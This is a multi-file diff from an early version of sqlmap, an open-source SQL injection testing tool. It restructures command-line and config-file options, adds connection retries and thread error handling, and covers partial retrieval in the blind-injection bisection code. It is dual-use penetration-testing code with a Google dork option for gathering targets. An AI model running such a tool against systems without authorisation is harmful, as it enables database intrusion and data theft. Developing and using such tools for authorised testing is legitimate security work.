@ -41,21 +41,25 @@ def cmdLineParser():
parser = OptionParser(usage=usage, version=VERSION_STRING)
try:
# Target options
target = OptionGroup(parser, "Target", "At least one of these "
"options has to be specified to set the source "
"to get target urls from.")
target.add_option("-u", "--url", dest="url", help="Target url")
target.add_option("-l", dest="list", help="Parse targets from Burp "
"or WebScarab logs")
target.add_option("-g", dest="googleDork",
help="Process Google dork results as target urls")
target.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
# Request options
request = OptionGroup(parser, "Request", "These options have to "
"be specified to set the target url, HTTP "
"method, how to connect to the target url "
"or Google dorking results in general.")
request.add_option("-u", "--url", dest="url", help="Target url")
request.add_option("-l", dest="list", help="List of targets")
request.add_option("-g", dest="googleDork",
help="Process Google dork results as target urls")
request.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
request = OptionGroup(parser, "Request", "These options can be used "
"to specify how to connect to the target url.")
request.add_option("--method", dest="method", default="GET",
help="HTTP method, GET or POST (default: GET)")
@ -94,10 +98,17 @@ def cmdLineParser():
request.add_option("--delay", dest="delay", type="float",
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float",
help="Seconds to wait before timeout connection "
"(default 10)")
# Injection options
injection = OptionGroup(parser, "Injection")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
injection.add_option("--string", dest="string",
help="String to match in page when the "
"query is valid")
@ -253,15 +264,13 @@ def cmdLineParser():
help="Save and resume all data retrieved "
"on a session file")
miscellaneous.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
help="Save options on a configuration INI file")
miscellaneous.add_option("--batch", dest="batch", action="store_true",
help="Never ask for user input, use the default behaviour")
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(injection)
parser.add_option_group(techniques)

12
lib/parse/configfile.py
View File

@ -79,12 +79,16 @@ def configFileParser(configFile):
config = ConfigParser()
config.read(configFile)
if not config.has_section("Request"):
raise NoSectionError, "Request in the configuration file is mandatory"
if not config.has_section("Target"):
raise NoSectionError, "Target in the configuration file is mandatory"
if not config.has_option("Request", "url") and not config.has_option("Request", "googleDork"):
condition = not config.has_option("Target", "url")
condition &= not config.has_option("Target", "list")
condition &= not config.has_option("Target", "googleDork")
if condition:
errMsg = "missing a mandatory option in the configuration "
errMsg += "file (url or googleDork)"
errMsg += "file (url, list or googleDork)"
raise sqlmapMissingMandatoryOptionException, errMsg
for family, optionData in optDict.items():

61
lib/request/connect.py
View File

@ -31,6 +31,7 @@ import socket
import time
import urllib2
import urlparse
import traceback
from lib.contrib import multipartpost
from lib.core.convert import urlencode
@ -38,6 +39,7 @@ from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException
from lib.core.settings import RETRIES
from lib.request.basic import forgeHeaders
from lib.request.basic import parseResponse
@ -48,6 +50,12 @@ class Connect:
This class defines methods used to perform HTTP requests
"""
@staticmethod
def __getPageProxy(**kwargs):
return Connect.getPage(**kwargs)
@staticmethod
def getPage(**kwargs):
"""
@ -55,6 +63,9 @@ class Connect:
the target url page content
"""
if conf.delay != None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
url = kwargs.get('url', conf.url).replace(" ", "%20")
get = kwargs.get('get', None)
post = kwargs.get('post', None)
@ -63,6 +74,7 @@ class Connect:
direct = kwargs.get('direct', False)
multipart = kwargs.get('multipart', False)
page = ""
cookieStr = ""
requestMsg = "HTTP request:\n%s " % conf.method
responseMsg = "HTTP response "
@ -115,6 +127,9 @@ class Connect:
req = urllib2.Request(url, post, headers)
conn = urllib2.urlopen(req)
# Reset the number of connection retries
conf.retries = 0
if not req.has_header("Accept-Encoding"):
requestHeaders += "\nAccept-Encoding: identity"
@ -161,40 +176,37 @@ class Connect:
status = e.msg
responseHeaders = e.info()
except (urllib2.URLError, socket.error), _:
warnMsg = "unable to connect to the target url"
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), _:
tbMsg = traceback.format_exc()
if "URLError" in tbMsg or "error" in tbMsg:
warnMsg = "unable to connect to the target url"
elif "timeout" in tbMsg:
warnMsg = "connection timed out to the target url"
elif "BadStatusLine" in tbMsg:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.multipleTargets:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
else:
if "BadStatusLine" not in tbMsg:
warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg
except socket.timeout, _:
warnMsg = "connection timed out to the target url"
if conf.retries < RETRIES:
conf.retries += 1
if conf.multipleTargets:
warnMsg += ", skipping to next url"
warnMsg += ", sqlmap is going to retry the request"
logger.warn(warnMsg)
return None
else:
warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg
except httplib.BadStatusLine, _:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.multipleTargets:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
time.sleep(1)
return Connect.__getPageProxy(get=get, post=post, cookie=cookie, ua=ua, direct=direct, multipart=multipart)
else:
raise sqlmapConnectionException, warnMsg
@ -208,9 +220,6 @@ class Connect:
logger.log(8, responseMsg)
if conf.delay != None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
return page

6
lib/request/inject.py
View File

@ -38,7 +38,7 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.data import temp
from lib.core.settings import TIME_DELAY
from lib.core.settings import SECONDS
from lib.request.connect import Connect as Request
from lib.techniques.inband.union.use import unionUse
from lib.techniques.blind.inference import bisection
@ -394,6 +394,6 @@ def goStacked(expression, timeTest=False):
duration = int(time.time() - start)
if timeTest:
return (duration >= TIME_DELAY, payload)
return (duration >= SECONDS, payload)
else:
return duration >= TIME_DELAY
return duration >= SECONDS

79
lib/techniques/blind/inference.py
View File

@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import threading
import time
import traceback
from lib.core.agent import agent
from lib.core.common import dataToSessionFile
@ -34,7 +35,10 @@ from lib.core.common import replaceNewlineTabs
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException
from lib.core.exception import sqlmapValueException
from lib.core.exception import sqlmapThreadException
from lib.core.exception import unhandledException
from lib.core.progress import ProgressBar
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
@ -46,6 +50,9 @@ def bisection(payload, expression, length=None):
on an affected host
"""
partialValue = ""
finalValue = ""
if kb.dbmsDetected:
_, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
@ -102,6 +109,7 @@ def bisection(payload, expression, length=None):
maxValue = limit
if (maxValue - minValue) == 1:
# NOTE: this first condition should never occur
if maxValue == 1:
return None
else:
@ -145,7 +153,7 @@ def bisection(payload, expression, length=None):
val = getChar(curidx)
if val == None:
raise sqlmapValueException, "Failed to get character at index %d (expected %d total)" % (curidx, length)
raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length)
value[curidx-1] = val
@ -157,9 +165,38 @@ def bisection(payload, expression, length=None):
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), s))
iolock.release()
def downloadThreadProxy(numThread):
try:
downloadThread()
except (sqlmapConnectionException, sqlmapValueException), errMsg:
conf.threadException = True
logger.error("thread %d: %s" % (numThread + 1, errMsg))
except KeyboardInterrupt:
conf.threadException = True
print
logger.debug("waiting for threads to finish")
try:
while (threading.activeCount() > 1):
pass
except KeyboardInterrupt:
raise sqlmapThreadException, "user aborted"
except:
conf.threadException = True
errMsg = unhandledException()
logger.error("thread %d: %s" % (numThread + 1, errMsg))
traceback.print_exc()
# Start the threads
for _ in range(numThreads):
thread = threading.Thread(target=downloadThread)
for numThread in range(numThreads):
thread = threading.Thread(target=downloadThreadProxy(numThread))
thread.start()
threads.append(thread)
@ -167,19 +204,27 @@ def bisection(payload, expression, length=None):
for thread in threads:
thread.join()
assert None not in value
# If we have got one single character not correctly fetched it
# can mean that the connection to the target url was lost
if None in value:
for v in value:
if isinstance(v, str) and v != None:
partialValue += v
value = "".join(value)
if partialValue:
finalValue = partialValue
infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), finalValue)
else:
finalValue = "".join(value)
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), finalValue)
assert index[0] == length
if isinstance(finalValue, str) and len(finalValue) > 0:
dataToSessionFile(replaceNewlineTabs(finalValue))
dataToSessionFile(replaceNewlineTabs(value))
if conf.verbose in ( 1, 2 ) and not showEta:
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), value))
if conf.verbose in ( 1, 2 ) and not showEta and infoMsg:
dataToStdout(infoMsg)
else:
value = ""
index = 0
while True:
@ -190,7 +235,7 @@ def bisection(payload, expression, length=None):
if val == None:
break
value += val
finalValue += val
dataToSessionFile(replaceNewlineTabs(val))
@ -203,9 +248,13 @@ def bisection(payload, expression, length=None):
dataToStdout("\n")
if ( conf.verbose in ( 1, 2 ) and showEta and len(str(progress)) >= 64 ) or conf.verbose >= 3:
infoMsg = "retrieved: %s" % value
infoMsg = "retrieved: %s" % finalValue
logger.info(infoMsg)
dataToSessionFile("]\n")
if not partialValue:
dataToSessionFile("]\n")
return queriesCount[0], value
if conf.threadException:
raise sqlmapThreadException, "something unexpected happen into the threads"
return queriesCount[0], finalValue

4
lib/techniques/blind/timebased.py
View File

@ -27,7 +27,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.settings import TIME_DELAY
from lib.core.settings import SECONDS
from lib.request import inject
@ -36,7 +36,7 @@ def timeTest():
infoMsg += "'%s'" % kb.injParameter
logger.info(infoMsg)
query = queries[kb.dbms].timedelay % TIME_DELAY
query = queries[kb.dbms].timedelay % SECONDS
timeTest = inject.goStacked(query, timeTest=True)
if timeTest[0] == True:

24
sqlmap.conf
View File

@ -1,10 +1,10 @@
[Request]
[Target]
# Target URL.
# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2
# PHP and MySQL (local)
url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
#url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1
#url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
url = http://127.0.0.1/sqlmap/mysql/get_int_partialunion.php?id=1
# PHP and Oracle (local)
#url = http://127.0.0.1/sqlmap/oracle/get_int.php?id=1
# PHP and PostgreSQL (local)
@ -21,7 +21,7 @@ url = http://127.0.0.1/sqlmap/mysql/get_int.php?id=1
#url = http://192.168.192.10/sqlmap/get_int.aspx?id=1
#url =
# List of targets
# Parse targets from Burp or WebScarab logs
# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path
# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
# 'conversations/' folder path
@ -34,9 +34,8 @@ list =
# Example: +ext:php +inurl:"&id=" +intext:"powered by "
googleDork =
# Testable parameter(s) comma separated. By default all GET/POST/Cookie
# parameters and HTTP User-Agent are tested by sqlmap.
testParameter =
[Request]
# HTTP method to perform HTTP requests.
# Valid: GET or POST
@ -88,9 +87,18 @@ threads = 1
# Default: 0
delay = 0
# Seconds to wait before timeout connection.
# Valid: float
# Default: 10
timeout = 10
[Injection]
# Testable parameter(s) comma separated. By default all GET/POST/Cookie
# parameters and HTTP User-Agent are tested by sqlmap.
testParameter =
# String to match in page when the query is valid, only needed if the
# page content dynamically changes at each refresh, consequently changing
# the MD5 of the page which is the method used by default to determine
@ -101,7 +109,7 @@ string =
# Force back-end DBMS to this value. If this option is set, the back-end
# DBMS identification process will be minimized as needed.
# If not set, sqlmap will detect back-end DBMS automatically by default.
# Valid: mssql, mysql, oracle, pgsql
# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql
dbms =